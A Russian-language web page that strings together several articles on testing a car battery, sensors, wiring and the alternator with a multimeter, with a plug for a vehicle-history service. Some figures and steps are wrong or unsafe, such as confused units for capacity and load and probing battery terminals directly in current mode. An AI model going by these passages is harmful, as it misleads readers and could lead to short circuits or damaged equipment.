33 просмотров
Рейтинг статьи
1 звезда2 звезды3 звезды4 звезды5 звезд
Загрузка...

Как проверить акб автомобиля мультиметром

Проверяем АКБ автомобиля с помощью мультиметра правильно

Иногда зимой у автолюбителей возникают проблемы при запуске авто. Это происходит из-за плохого влияния отрицательных температур на жидкость, залитую в аккумуляторную батарею (электролит). Чтобы избежать неприятностей приходится с определённой периодичностью контролировать емкость аккумулятора. Рассмотрим, как проверить аккумулятор автомобиля мультиметром.

Способы проверки заряда АКБ

Существует несколько способов проверить зарядку аккумулятора. Некоторые можно осуществить при помощи специально разработанных для этого устройств. А в некоторые батареи даже встроено такое приспособление.

Существующие способы померить заряд АКБ:

  • проверка при помощи встроенного в автомобильный аккумулятор специального индикатора;
  • использование «нагрузочной вилки»;
  • измерение обычным мультиметром.

Как определить напряжение по встроенному индикатору

Современные автомобили уже оборудованы встроенными индикаторами, которые могут помочь хозяину авто узнавать в любой момент о текущем состоянии заряда.

Впервые такие аккумуляторы вышли с конвейеров японских автоконцернов. Определить степень зарядки помогает специальное «зелёное окошко», которое и является индикатором.

Другое его название гидрометр. Цвет окошка зависит от степени заряженности:

  • зеленый – заряжен;
  • серый либо белый – емкость потеряна;
  • черный – АКБ разряжена до конца, уровень электролита ниже критического.

Если в машине стоит аккумулятор с индикатором, то делать замер заряда мультиметром или «нагрузочной вилкой» нет смысла.

Стоит отметить, что аккумуляторы такого типа стоят недешево. В некоторых случаях цена увеличивается примерно на треть. Не каждый автолюбитель готов переплачивать за такую батарею.

Тогда подойдут другие методы измерять заряд аккумулятора.

Проверка напряжения нагрузочной вилкой

Нагрузочная вилка считается сегодня инструментом слегка устаревшим. Встретить ее чаще всего можно на станциях технического обслуживания, чем у частных автовладельцев. Тем не менее, такая проверка получается наиболее верная и профессиональная.

Нагрузочной вилкой называют определенный инструмент, который с особой точностью позволяет установить уровень неисправности аккумулятора. В нем объединены мультиметр и нагрузочное сопротивление.

  • устройство соединяется с клеммами АКБ, при этом возникает ток короткого замыкания. Это своего рода имитация работы стартера. При отсутствии нагрузки батарейка вырабатывает 12,7 Вольта, с нагрузкой – гораздо меньше;
  • далее нужно считать показания прибора. Они покажут, на каком уровне будет находиться заряд в момент, когда владелец заведет машину.

Ещё один нюанс, который нужно учесть при измерении таким способом: проверять напряжение желательно при температуре батареи 20-25 градусов и не делать это очень часто. В противном случае можно потерять большую долю емкости.

Такой способ надежный и достоверный. Единственный его минус в том, что нагрузочная вилка практически не встречается в обычном гараже у рядового автолюбителя. Для таких хозяев авто стоит подумать о том, как мультиметром проверить напряжение аккумулятора автомобиля.

Измерение заряда мультиметром

Мультиметром называют прибор способный замерить ампераж, напряжение, сопротивление и температуру у технических устройств.

Данные тестеры применяют не только, чтобы замеривать заряд АКБ машин. Они с высокой точностью могут определить напряжение в батарее шуроповертов, ноутбуков и телефонов.

Например, многие устройства IPHONE работают на литий-ионных АКБ, которые очень удобно тестировать электронными японскими мультиметрами компании Sanwa или китайскими DT-830b.

Для современных владельцев авто это практически идеальный вариант. Стоимость такого прибора вполне приемлемая. Особенно удобно пользоваться теми моделями, которые оснащены электронными табло.

Такой точности, как при первом и втором способе проверки не будет. Однако померить заряд, когда это необходимо и сориентироваться в дальнейших действиях, вполне возможно.

Как пошагово замерить напряжение мультиметром на аккумуляторе автомобиля:

  1. Необходимо при помощи соответствующих проводов подключить мультиметр. Тестер должен работать в режиме «вольтажа» (замера напряжения). Для этого его устанавливают на уровень 20Вольт.
  2. Специальными металлическими щупами, которые расположены на проводах, прибор прикладывается к клеймам батарейки (щуп красного цвета — к плюсу, черный – к минусу). В редких случаях провода бывают одинакового цвета.
  3. Далее на электронном табло должны появиться данные замеров.

Для удобства автолюбителей разработана специальная шкала значений, помогающая по данным тестера определить степень заряженности батареи:

  1. Более 12,7Вольт – батарейка полностью заряжена.
  2. Если значения в диапазоне от 12,1 до 12,5Вольт, то батарея заряжена наполовину.
  3. В случае значений меньше 11,7Вольт – АКБ сильно разряжена.

Исходя из представленных параметров, можно сделать вывод, что значения напряжения на приборе менее 12,7Вольт, показывают частичную заряженность АКБ. В случаях, когда мультиметр показывает менее 11,7Вольт, аккумулятор стоит поставить на зарядку.

У любой машины постоянно происходит минимальная утечка тока (в пределах 50-80 мА.). В частности:

  • на охранную сигнализацию расходуется 25-25мА;
  • контроллер у системы впрыска забирает 5мА;
  • магнитола автомобиля расходует 3мА;
  • приборная панель с блоком центрального замка также забирает часть тока.

В результате все вместе разряжает АКБ в пределах 60мА. Эти затраты не являются для батареи критическими и её можно эксплуатировать еще несколько лет. Другое дело, если расход составит более 60-80 мА, то батарейка быстро разрядится.

Технология замера утечки тока

Как проверить аккумулятор, с целью определения утечки тока, тестером:

  1. Автомобиль предварительно готовится к проверке. Для этого отключаются магнитола, габариты, свет в салоне авто.
  2. Следом в разорванную цепь подключается амперметр и снимаются данные.
  3. В случае обнаружения амперметром тока утечки, нужно поочередно вытащить и поставить на место в строгом порядке ряд предохранителей и реле. Это позволит понять, в какой цепи происходит утечка. После этого ток должен нормализоваться.

Для того, чтобы правильно при помощи тестера научиться определять утечку тока, рекомендовано следующее видео:

Быстрая проверка показателей аккумулятора

В ряде случаев владельцам авто совсем некогда заниматься отсоединением АКБ от машины, а также «копаться» с освещением и приборной панелью. Такие хозяева машин определяют уровень зарядки АКБ без ее снятия, прямо под капотом.

Этот процесс выглядит следующим образом:

  1. Когда произошло замирание машины после выключения мотора, мультиметр подключают к АКБ по схеме: плюс к «+», минус соответственно к «минусу». Стоит учитывать, что показатели будут с незначительными отклонениями. 12,7Вольт – показатель нормы.
  2. Затем машина заводится. Когда мотор заработает, напряжение поднимется до 14,7Вольт.
  3. Рекомендовано проверить еще с нагрузкой (внешнее освещение, обогрев окон, средний режим печки). В таком случае норма – 14,6Вольт.

Измерить напряжение аккумулятора автомобиля мультиметром — задача посильная даже начинающему автолюбителю. Позволить себе дорогой аккумулятор, оснащенный специальным индикатором, может не каждый.

Практичным и универсальным вариантом считается измерение заряда АКБ мультиметром. Этот прибор, с говорящей приставкой «МУЛЬТИ», позволяет измерить не только напряжение, но и силу тока. Кроме того, мультиметр может пригодиться и для другой электротехники, включая телефоны, ноутбуки, шуруповерты. Помните, что приобретать такой прибор лучше у проверенных производителей в специализированных магазинах.

Как проверить заряд аккумулятора автомобиля

Аккумулятор выполняет важную роль в автомобиле. При повороте ключа зажигания он посылает ток на стартер. С его помощью происходит запуск двигателя. Если он разряжен завести машину не получится.

Поэтому, чтобы не возникли проблемы с запуском, особенно это важно в зимний период, необходимо периодически следить за емокстью аккумуляторной батареи. Т.к. с наступлением зимы многие автовладельцы сталкиваются с этим. Связано это с тем, что отрицательная температура оказывает плохое влияние на электролит. О том, как проверить заряд аккумулятора автомобиля в домашних условиях рассмотрим ниже.

Как правильно проверить аккумулятор автомобиля на работоспособность

Как проверить автомобильный аккумулятор?

Напряжение полностью заряженной батери автомобиля должно быть не менее 12,6 вольта. Если напряжение менее 12 вольт, степень ее заряженности упала больше чем на 50 %, то его необходимо срочно зарядить!

Нельзя допускать глубоких разрядов АКБ, это ведет, повторюсь еще раз, к сульфатации пластин. Напряжение на аккумуляторной батареи величиной меньше 11,6 в означает, что она разряжена на 100 %.

Способы проверки состояния акб автомобиля:

Каждый из данных способов имеет свои тонкости и нюансы. Теперь подробнее разберем как проверить своими руками аккумулятор автомобиля на работоспособность.

Как проверить заряд аккумулятора автомобиля по индикатору

В настоящее время многие АКБ оснащены встроенным индикатором, обозначающий его текущее состояние. Первыми применять в производстве АКБ стали в Японии.

На крышке аккумуляторной батареи имеется специальное окошко. Это и есть индикатор заряда аккумулятора автомобиля. Его еще называют гидрометром. Обычно имеет зеленый цвет, говорит о том, что он полностью заражен. По мере разряда цвет изменяется. Если же белый или серый цвет – это сигнал о том, что часть емкости потеряно. Значит необходимо зарядить. Если же цвет черный – это значит, что он полностью разряжен и требуется замена.

Принцип его действия в следующем:

  • По мере увеличения уровня заряда автомобильной батареи повышается плотность электролита. Что в свою очередь приводит к тому, что поплавок, в виде зеленого шарика, поднимается по трубке, и становится виден в специальном окошке. Поплавок всплывает когда заряд АКБ составляет 66% и выше.
  • Если же поплавок не всплывает, значит состояние автомобильной батареи ниже нормы. Как отмечалось, окошко будет черного цвета, но в некоторых предусмотрен еще один шарик красного цвета, который будет всплывать при низком заряде аккумулятора.
  • При пониженном уровне электролита в батарее (частичной потере емкости) через глазок будет виден сам электролит. В такой ситуации необходимо долить дистиллированную воду и подзарядить его.

Как проверить аккумулятор при покупке в магазине или с рук? Определить исправность автомобильной батареи можно и по индикатору – достаточно простой и легкий способ.

Однако, стоит помнить, что индикатор дает возможность выполнить предварительную оценку степень заряженности, но никак не точную. И в полной мере полагаться на его показания не следует, есть более точные методы. К тому же, такая проверка возможна не со всеми АКБ, некоторые данным окошком не оснащены. Поэтому важно быть в курсе и других методов.

Как проверить заряд автомобильного аккумулятора мультиметром

Мультиметр – специальный прибор, который используется для измерения напряжения в сети. Важный инструмент, который обязан быть у любого водителя. Цена прибора не велика. Мы советуем пользоваться теми, которые оснащены электронным табло.

Как правильно проверить заряд аккумулятора автомобиля при помощи мультиметра? Для этого выполните следующие действия:

  1. Подключаете провода мультиметра.
  2. Выставляется мультиметр в режим замера напряжения и устанавливаете на 20 Вольт.
  3. Металлическими щупы проводов прикладываются к клеммам АКБ. (Красный щуп к плюсовой клемме, черный к минусовой).
  4. Смотрите показания.

Очень важно! При проверке заряда аккумулятора тестером зажигание автомобиля должно быть выключено!

Как проверить автомобиль мультиметром

В этот раз расскажем, как и зачем перед покупкой нужно проверить авто мультиметром. Методами можно пользоваться прямо при встрече с продавцом и осмотре автомобиля. Чтобы дело шло быстрее, потренируйтесь накануне на машине друга или знакомого.

Прежде всего, мультиметр нужен затем, чтобы вовремя заметить утечку тока на машине. Из-за нее двигатель может работать неровно, выбросы станут более пахучими. Проводка может замкнуть, что выведет из строя магнитолу, электронный блок управления и другие приборы. Или железный конь просто не заведется.

Содержание

Как проверить утечку тока на б/у автомобиле мультиметром

Проверка включает в себя:

    • Заглушите мотор, выньте ключ. Закройте двери, но откройте стекла — аккумулятор будет работать непостоянно, машина может закрыться на центральный замок.
    • Убедитесь, что дополнительная подсветка, магнитола отключены.
    • Снимите «минусовую» клемму с АКБ.
    • Положите один щуп между «минусовой» клеммой и отрицательным выводом аккумулятора — прибор покажет значение тока утечки.

Нормальный показатель — 15-70 мА. Если цифры больше и вы с продавцом располагаете временем, попробуйте найти причину. Для этого также подключите мультиметр , после чего начните один за другим вынимать реле и предохранители.

Показания пришли в норму — вы нашли причину утечки тока. Возможно, дальше потребуется ремонт или замена детали, а то и всей проводки. Можете уверенно просить у продавца авто скидку или совсем отказаться от покупки.

Причин утечки может быть несколько. К ней могут быть причастны:

  • аккумулятор;
  • датчики;
  • высоковольтные провода;
  • генератор.

Каждый элемент можно проверить с помощью мультиметра.

Как проверить аккумулятор автомобиля мультиметром

Проверка аккумулятора автомобиля мультиметром включает в себя подключение сразу двух щупов. Мотор перед измерением также заглушите.

Красный щуп прислоните к «плюсовой» клемме, черный — к «минусовой». Если перепутаете — не страшно, прибор покажет актуальные цифры, просто со знаком минус.

Смотрите на экран прибора. Нормальный заряд аккумулятора колеблется в районе от 12,6 до 12,9 вольт.

Работу АКБ можно проверить также с запущенным мотором. При такой проверке аккумулятора автомобиля мультиметром вы также узнаете, как аккумулятор работает в паре с генератором, а также исправен ли регулятор напряжения.

Нормальные цифры при работающем двигателе — 13-14 вольт. Если мультиметр показывает меньше — аккумулятор нужно зарядить, или есть утечка тока.

Помните: мультиметр покажет заряд АКБ, но не расскажет о его работе исчерпывающе. Для этого существуют другие устройства. Например, нагрузочная вилка.

Как проверить датчики автомобиля мультиметром

Причиной «смерти» аккумулятора, скачков напряжения, ненужных значений на панели приборов могут быть различные датчики в машине. По опыту автомобилистов, чаще всего вызывают проблемы 5 видов датчиков:

Понять, где они располагаются, вы можете из инструкции к машине, на сайтах автолюбителей, различных форумах.

Для проверки датчиков автомобиля мультиметром вам понадобится также информация о показателях напряжения в норме именно для вашего авто. Ее также можно найти в инструкции или в интернете.

Датчик ABS

Его проверяют по двум параметрам: напряжению и сопротивлению.

Чтобы начать измерение, выберите на мультиметре соответствующий режим. Если вы хотите узнать показатель сопротивления, для большинства норма – 1,2-1,8 кОм. Подключите прибор к датчику и начните замеры. При этом пошатайте провода, идущие к элементу. Если цифры на экране меняются и становятся выше или ниже нормы – с датчиком проблемы.

С измерением напряжения чуть сложнее – сделать это можно только с помощью домкрата или в автосервисе на стенде. Нужно раскрутить колесо автомобиля до 40-50 оборотов в минуту и следить за показаниями мультиметра. На любой машине он должен выдать 2 вольта.

Датчик коленвала

Важный элемент — без него машина вообще не запустится, или ехать на ней вы не сможете. Если визуально он кажется исправным, возьмитесь за мультиметр. Подключите прибор к датчику и измерьте сопротивление. Норма, как правило, от 550 до 750 Ом. Но обязательно проверьте, актуальны ли эти цифры для автомобиля, который вы смотрите.

Кислородный датчик

Определяет, остался ли кислород в выхлопных газах. Перед замерами также осмотрите его – возможно, он поврежден и мультиметр вообще не понадобится. Тогда элемент нужно просто заменить.

Если все в порядке, измерьте, как с датчиком ABS, напряжение и сопротивление. Алгоритм тот же. Заводите машину и наблюдайте за прибором. После пуска на экране высветятся цифры 0,1-02, вольта. Машина прогреется – прибор покажет до 0,9 вольт. Не заметили, что показатель изменился – датчик, скорее всего, неисправен.

Если проверка напряжения прошла успешно, узнайте показатели сопротивления. Норма колеблется от 10 до 40 Ом.

Датчик детонации

Определяет ударную волну при сгорании топлива. Показатели сопротивления у него на каждой машине индивидуальные – ищите информацию в разных источниках.

С напряжением чуть проще. Сначала снимите датчик. Щуп с плюсом подключите к сигнальному проводу, «минусовой» — к массе, ближе к крепежному болту. Дальше самое интересное – ударьте датчиком о стену, стул или стол. Только так мультиметр зафиксирует показатель напряжения. Норма на большинстве авто – от 30 до 40 милливольт.

Датчик скорости

Перед замерами обязательно осмотрите элемент. Возможно, он просто окислился или оплавился.

После подключайте мультиметр и измеряйте. Порядок действий тот же, что с датчиком детонации.

Единственное – ударять им обо что-либо не нужно. Можно просто повращать или потрясти. Если мультиметр вообще не покажет напряжения – датчик неисправен.

Как проверить высоковольтные провода на авто мультиметром

Если вы ощущаете потерю мощности авто, видите повышенный расход топлива, машину трясет, а холостые обороты плавают — пора проверить высоковольтные провода. Точнее — измерить в них сопротивление. Запоминайте порядок действий:

  • отсоедините провода от машины или отключите один провод с двух сторон;
  • включите прибор в режим омметра и прислоните щупы к обеим сторонам провода.

Нормальный показатель сопротивления 6-10 кОм. Если прибор показывает меньше, вплоть до нуля, не пугайтесь. На цифры мультиметра влияет множество факторов, например:

  • качество изоляции проводов;
  • длина;
  • наличие микроповреждений;
  • тип проводов.

Если показатели вашей машины выходят за пределы нормы, лучше обратитесь в автосервис, где сопротивление измерят профессиональными и более точными приборами.

Как проверить мультиметром генератор на машине

Проверка генератора происходит аналогично замерам показателей других элементов авто, из-за которых происходит утечка тока.

  • Традиционно выключаете зажигание, вынимаете ключ, выключаете магнитолу и прочее.
  • Подключаете мультиметр к аккумулятору.
  • Замеряете напряжение. Полностью заряженная батарея выдаст от 12,5 до 12,9 вольт.
  • После этого заводите двигатель, включаете подогрев стекол, сидений, «печку», ближний свет.

И снова измеряете напряжение. Норма — 13-14 вольт. Максимум — 14,8 вольт. В этих случаях генератор работает, как часы. Если мультиметр показывает цифры меньше, генератор не заряжает батарею. Значит, готовьтесь выложить приличную сумму за замену или ремонт агрегата.

Вместо послесловия

При покупке машины с пробегом полезно знать, как найти утечку тока и понять ее причину. Берите мультиметр на осмотр машины — спасете себя от неприятных сюрпризов, вроде внезапно севшего аккумулятора, скачков напряжения или сгоревшей проводки.

С той же целью проверяйте историю автомобиля. Сделать это можно прямо во время беседы с продавцом. Удобно воспользоваться сервисом «Автокод» — промониторите информацию сразу в 13 источниках: ГИБДД, РСА, ЕАИСТО, банках, налоговой и других службах. Проверка займет 5 минут.

После вы узнаете реальный пробег, количество владельцев, историю штрафов, а также информацию об угоне, участии в ДТП, ограничениях на регистрацию авто и многое другое. Будьте бдительны!

Полностью изучив онлайн-отчет, все же стоит внимательно приглядеться к техническим нюансам авто при покупке. А если вы не уверены в своих знаниях, или выехать на осмотр не предоставляется возможности, закажите услугу выездной проверки. Мастер проведет диагностику за вас и сделает подробное заключение с профессиональной точки зрения.

Как проверить аккумулятор мультиметром?

Ни для кого не секрет, что работа современных автомобилей напрямую зависит от того, в каком состоянии находится аккумулятор. Ведь время двигателей, которые могут заводиться от поворота рычага уже давно прошло, не говоря уже о том, что для функционирования современных электронных систем отвечающих за безопасность вождения, навигацию и т.д. необходимо электропитание. Соответственно поддерживать аккумулятор в хорошем состоянии достаточно важно. К сожалению методы его диагностики неизвестны многим владельцам авто. Поэтому в данной статье мы расскажем, как проверить аккумулятор мультиметром.

Мультиметр является универсальным электроприбором, который стоит иметь при себе любому водителю. С его помощью можно измерить множество важных параметров, которые свидетельствуют о работе аккумулятора.

Как проверить мультиметром заряд аккумулятора?

В большинстве современных аккумуляторов имеется специальный датчик, который изменяет свой цвет в зависимости заряда аккумулятора. Однако получить с его помощью точные данные с его помощью не получится.

Как проверить напряжение аккумулятора мультиметром?

Для того чтобы проверить заряд литий-ионного аккумулятора необходимо выполнить следующие действия:

  • Перевести мультиметр в режим вольтметра (измерение напряжения) и установить диапазон от 0 до 20V;
  • Отсоединить аккумулятор от электропроводки автомобиля;
  • Подсоедините красный щуп к положительному гнезду;
  • Подсоедините черный щуп к отрицательному гнезду;
  • Запишите показания.

Если мультиметр показывает, что напряжение равно 12,6 вольт, то это свидетельствует о том, что батарея не нуждается в зарядке и полностью работоспособна. Если показания ниже 12,6 – это обозначает необходимость дозарядки аккумулятора.

В том случае, если мультиметр показывает менее двенадцати вольт, то аккумулятор полностью разряжен, и необходимо срочно зарядить его. Если показания меньше одиннадцати вольт – использование такого аккумулятора может сжечь генератор или зарядное устройство, а значит, от него лучше избавиться и купить новый.

Важно помнить о том, что для получения актуальных данных нужно проверять заряд нужно подождать 5-6 часов после того как аккумулятор будет отключен от автомобиля.

Как проверить зарядку аккумулятора от генератора мультиметром? Точно таким же образом, но теперь для замера показателей необходимо будет отключить генератор от аккумулятора, получить нужные данные, и при необходимости снова поставить его на дозарядку.

Как проверить емкость аккумулятора мультиметром?

Еще одним важным показателем является емкость аккумулятора. Эта характеристика показывает, какое количество заряда он отдаст в течение конкретного промежутка времени, при определенном напряжении, и она измеряется в ампер-часах.

Емкость аккумулятора автомобиля, при помощи мультиметра можно проверить несколькими способами.

Проверка емкости аккумулятора авто под нагрузкой

Одним их способов проверки емкости аккумулятора с помощью мультиметра является применение нагрузки, в роли которой может выступать обычная лампочка. Стоит помнить, что если она начинает постепенно тускнуть, то на этом можно заканчивать проверку, поскольку аккумулятор неработоспособен.

Нагрузку для проверки аккумулятора необходимо подбирать таким образом, чтобы она могла забрать половину тока батареи, то есть если емкость равна 7 Амперам в час, то нагрузка должна быть 3,5 Вольт. Отличным вариантом может быть автомобильная фара мощность, которой равна 35-40 Ватт.

Поэтапно данная процедура выглядит так:

  • Аккумулятор отключается от генератора;
  • Подключается нагрузка;
  • Около двух минут аккумулятор должен работать под нагрузкой;
  • Отключается нагрузка;
  • К аккумулятору подключается мультиметр в режиме измерения напряжения;
  • Снимаются показатели.

Если аккумулятор исправен, то его напряжение должно быть выше 12,4 Вольт. Соответственно любые проблемы при запуске, скорее всего, вызывает неисправность электропроводки или иных систем автомобиля. В том случае, если показатели мультиметра находятся в промежутке от 12 до 12,4 Вольт, то это значит, что долго он не проработает и в скором времени нужно будет приобрести новый аккумулятор.

Проверка емкости аккумулятора методом контрольного разряда

Для того чтобы проверить аккумулятор таким образом необходимо полностью зарядить его и нагрузить таким образом, чтобы сила тока разрядки соответствовала расчетному значению, которое указано в паспорте батареи. При этом в цепь включается амперметр или мультиметр включенный в режим отображения силы тока в цепи.

После этого, необходимо зарегистрировать через какое время сила тока уменьшится более чем на 50%. Получившееся значение сравниваем с паспортными данными аккумулятора и если разница не велика, то он вполне годен к использованию. Если разница велика, то это явное свидетельство о том, что батарею нужно заменить.

Как проверить ампераж аккумулятора мультиметром?

Несмотря на то, что для успешной работы батарей основными характеристиками являются напряжение (заряд) и емкость, немалое количество водителей интересуется тем как проверить силу тока аккумулятора мультиметром или амперметром.

В первую очередь необходимо помнить, что силу тока бесполезно замерять непосредственно на аккумуляторе. Более того, это может привести короткому замыканию.

Для того чтобы проверить амперы аккумулятора мультиметром необходимо снимать показания непосредственно из электроцепи. Однако стоит помнить о том, что данная характеристика во многом будет зависеть от количества и типа подключенных приборов.

Видео — проверка аккумулятора

Проверяем аккумулятор с помощью мультиметра

Мультиметр – универсальный прибор для точного определения напряжения, силы тока или сопротивления и не только. Использование даже недорогих китайских моделей позволяет эффективно проверить аккумулятор любого типа. В этой статье будут описаны основные способы использования тестера для определения работоспособности батарей.

Какие аккумуляторы можно проверить мультиметром

Все виды аккумуляторов характеризуются такими параметрами, как ёмкость, сила тока или напряжение, поэтому с помощью измерительного прибора можно легко проверить любой аккумулятор на работоспособность.

Наиболее часто, по причине большой распространённости, приходится таким способом измерять показатели у автомобильных аккумуляторов, Ni-Cd, Ni-MH, Li-Pol и Li-Ion батарей.

Даже если автомобиль или гаджет оснащается штатными программами измерения заряда батареи, во многих случаях, такие утилиты показывают общую информацию о величине заряда. При этом, точности таких утилит не всегда стоит доверять.

Проверяем параметры аккумулятора с помощью мультиметра

Для проведения измерительных работ, во многих случаях, не обойтись без демонтажа батареи. Если необходимо протестировать автомобильный АКБ, то его также следует снять с машины.

Напряжение

Все аккумуляторы выдают на клеммах постоянный электрический ток, поэтому для его измерения переключатель режимов мультиметра следует перевести в положение DC. Вольтаж батарей может существенно отличаться от типа аккумулятора, поэтому чтобы получить максимально корректные показатели необходимо правильно выбрать максимальное напряжение, которое может измерить прибор.

На переключателе мультиметра имеется несколько режимов, которыми можно замерить постоянное напряжение. Для большинства аккумуляторов достаточно выставить ограничение на 20 В. Практически все пальчиковые аккумуляторы и батареи телефонов способны выдавать значительно меньшее напряжение.

Исключением из этого правила является только измерение автомобильных АКБ на 24 В, и некоторых батарей ноутбуков, которые при полном заряде могут иметь на своих выводах напряжение, превышающее 20 В.

Обратите внимание. Таким же образом можно измерить напряжение у производственных аккумуляторах или в розетке, только в этом случае надо переключатель на мультиметре переключить на более высокое напряжение, например 200 V.

Сейчас выставлено значение 20V, но если напряжение источника будет выше, то надо устанавливать 200 или 1000 в зависимости от напряжения источника.

При измерении важно соблюсти полярность, то есть подключить красный щуп к плюсу аккумулятора, а чёрный – к минусу. При переполюсовке устройства, оснащённые цифровым дисплеем, проинформируют о нарушении полярности знаком минуса перед числом.

На стрелочных приборах такое подключение вызовет движение стрелки в обратном направлении, что совершенно не позволит получить правильные замеры вольтажа. Хотя в целом в этом ничего страшного нет.

Сила тока

Для того чтобы измерить силу тока аккумулятора небольшой мощности достаточно перевести прибор в режим измерения этого параметра (А). Прикоснувшись щупами прибора к клеммам батареи можно получить точное значение в миллиамперах.

При проведении измерений на АКБ большей мощности прибор переводится в положение «10А», а положительный выход мультиметра переставляется в соседнюю ячейку.

Если необходимо замерить силу тока на автомобильном аккумуляторе, то эти два способа не годятся, ведь сила разрядного тока таких АКБ может достигать нескольких сотен ампер. Проводить подобные измерения можно только с использованием специального тестера, например, Bosch BAT-131.

Ёмкость

С помощью мультиметра можно рассчитать приблизительно фактическую ёмкость АКБ. Кроме тестера потребуется собрать или приобрести стабилизатор напряжения, который должен соответствовать номинальному вольтажу аккумулятора.

Затем следует подобрать нагрузку, которая может быть запитана от батареи на достаточно продолжительном отрезке времени. Для вычисления ёмкости также следует подготовить секундомер.

Процесс измерения производится в такой последовательности:

  • Мультиметр переводится в режим измерения силы тока (10 А).
  • Измерительный прибор последовательно подсоединяется в схему, состоящую из источника тока, стабилизатора напряжения и нагрузки.
  • Включается секундомер.

После включения схемы следует зафиксировать значения мультиметра, а с помощью секундомера определить количество времени, которое понадобится для полной разрядки аккумулятора. После умножения силы тока на время можно получить фактическую ёмкость батареи, измеряемую в ампер/часах.

Применение данного метода для измерения ёмкости многих кислотных батарей не рекомендовано, по причине негативного воздействия полного разряда аккумулятора на его работоспособность.

Пример! Если мы заранее знаем, что подключенное к аккумулятору устройство потребляет 10 а/ч, то в зависимости от того, сколько часов оно проработает, такая и будет емкость батареи. Если в нашем случае устройство проработает 10 часов, то емкость аккумулятора составит 100 Ампер.

Внутреннее сопротивление

С помощью мультиметра можно легко измерить внутреннее сопротивление источника тока. Для выполнения этой операции необходимо:

  • Измерить напряжение на клеммах аккумулятора.
  • Подключить нагрузку и измерить падение напряжения и силу тока в цепи.
  • Произвести вычисления по формуле R = U/I, где R – внутреннее сопротивление, U – величина разности напряжения на клеммах аккумулятора до включения нагрузки и после, I – сила тока в цепи.

Этот метод подходит для измерения практически любого типа аккумуляторов и батарей.

Высокий ток утечки

Ток утечки

Измеление тока утечки осуществляется очень просто. Чтобы определить этот параметр необходимо перевести мультиметр в режим измерения силы тока, подключить минусовую клемму батареи к устройству, а плюсовой выход АКБ соединить с подключаемым кабелем через тестер.

Величина тока утечки будет отображена на цифровом дисплее. При измерении тока утечки на автомобиле следует перевести мультиметр в режим измерения сопротивления (10 А), а все потребители электроэнергии должны быть отключены.

Перезаряд

Для определения перезаряда мультиметр следует перевести в режим измерения напряжения. После определения вольтажа следует сравнить показатели номинального значения батареи с полученными в результате измерения. Если последние будут более чем на 20% превышать нормальные показатели, то это будет говорить о том, что аккумулятор перезаряжен.

Перезаряд аккумулятора является достаточно опасным явлением. Кислотные аккумуляторы, в этом случае, начинают закипать с образованием взрывоопасного газа. Литий-ионные батареи могут загореться или взорваться, если их заряжать выше нормы.

Степень заряженности

Для многих видов батарей степень заряженности проверяется по напряжению. Как и в предыдущем случае необходимо знать вольтаж батареи при стопроцентном заряде. Полностью заряженная свинцовая батарея должна иметь на клеммах напряжение 12,7 Вольт.

Полностью заряженный автомобильный аккумулятор

Полной разрядке АКБ будет соответствовать значение 10,5 В. Несложно определить таким образом степень заряженности батареи если показатели вольтажа будет отклоняться от этих значений.

Аналогичным образом, зная номинальные значения напряжения, можно измеряя напряжение с помощью мультиметра примерно определить степень заряженности пальчикового аккумулятора либо батареи для мобильного телефона или переносного компьютера.

Как проверить заряд аккумулятора мультиметром. Узнаем показания в домашних условиях + ВИДЕО

Иногда требуется проверить аккумулятор автомобиля на заряд. Ну например стояла машина долгое время, клемма была скинута, и вроде двигатель запустился – но непонятно нужно ли подзаряжать батарею или нет? Ведь «недозаряд» может сыграть злую шутку, плотность электролита упадет и ваш АКБ попросту может замерзнуть. В салоне современного авто датчиков заряда нет, а поэтому придутся проверять мультиметром – сейчас их просто навалом, причем не обязательно это будет дорогой вариант. Кстати внизу будет и видео версия, так что читайте – смотрите …

СОДЕРЖАНИЕ СТАТЬИ

Способов проверить аккумулятор не так-то много, два способа с применением сторонних устройств, а вот последний может быть встроен в саму батарею. Если их перечислить то это:

  • Встроенный индикатор
  • «Нагрузочная вилка»
  • Обычный мультиметр

Сегодня я хочу рассказать про все три типа, но хочется начать именно с «встроенного индикатора».

«Зеленое окошко»

Некоторые типы АКБ имеют встроенный индикатор, пришло к нам это изобретение с Японии, после стали устанавливать большинство компаний, на необслуживаемые типы.

Суть проста, справа или слева, также бывает и посередине размещается маленький глазок, в котором есть не сильное свечение – индикатор. Оно имеет три положения, проверить очень легко:

  • Зеленый – батарея имеет полный заряд.
  • Белый – низкий уровень электролита.
  • Черный – АКБ разряжен, нужно подзарядить.

Как видите если у вас такой вариант, то собственно мультиметр и нагрузочная вилка вам не нужны. Пришли на стоянку — открыли капот — посмотрели на индикатор – приняли решение. Если нет «зеленого окошка» — срочно подзаряжать.

Однако такие типы недешевые, они стоят примерно на 20 – 30 % дороже среднестатистического аккумулятора, многие водители экономят, а поэтому такая проверка не пройдет! Переходим к последующим методам.

Нагрузочная вилка

«Что» — спросите вы? Что это вообще такое? ДА ребята инструмент не популярный, да и встретишь его, пожалуй только на СТО. Однако проверка аккумулятора этим приспособлением самая точная.

Суть заключается вот в чем – это устройство подсоединяется к клеммам аккумулятора и дает ток короткого замыкания. Если без нагрузки батарея может вырабатывать 12,7 Вольта, то под нагрузкой напряжение конкретно, проседает.

Под нагрузкой напряжение на должно падать меньше 9 – 10 Вольт. После того как отсоединили нагрузку, происходит восстановление до 12,7Вольта. Если под нагрузкой происходит сильное проседание, до 3 — 5В – то батарея «дохлая»! Она не запустит двигатель авто.

То есть нагрузочная вилка имитирует нагрузку стартера на аккумулятор автомобиля, если нагрузка выдержана, то батарею можно использовать. Еще раз подчеркну – проверка заряда на этом устройстве, самая точная и достоверная. Но как вы понимаете – нагрузочной вилки в простом гараже или у вас дома в 90% случаев не будет! Поэтому проверить, скорее всего получится только мультиметром.

Проверка мультиметром

Мультиметр — это приспособление для замера силы тока, вольтажа, а также сопротивления и температуры. Применяется во многих сферах электроники (при ремонте, при изготовлении, при тестировании и т.д.), им можно определить напряжение практически в любой электрической цепи (правда на моем ограничение в 600В, так больше не стоит мерить). Также можно проверить и аккумулятор. Конечно, он не дает таких точных показаний, как скажем первый и второй способы, однако немного сориентироваться можно.

Сейчас небольшая инструкция:

  • Собираем мультиметр, провода должны быть подключены в режим «вольтажа» (замер напряжения), а не в «ампеража» (замер силы тока).

  • Устанавливаем поворотный переключатель в положение 20 Вольт, то есть он будет показывать нам все что ниже, а как мы знаем аккумулятор, у нас вырабатывает 12,7 – 13,2Вольта, примерно такой диапазон.
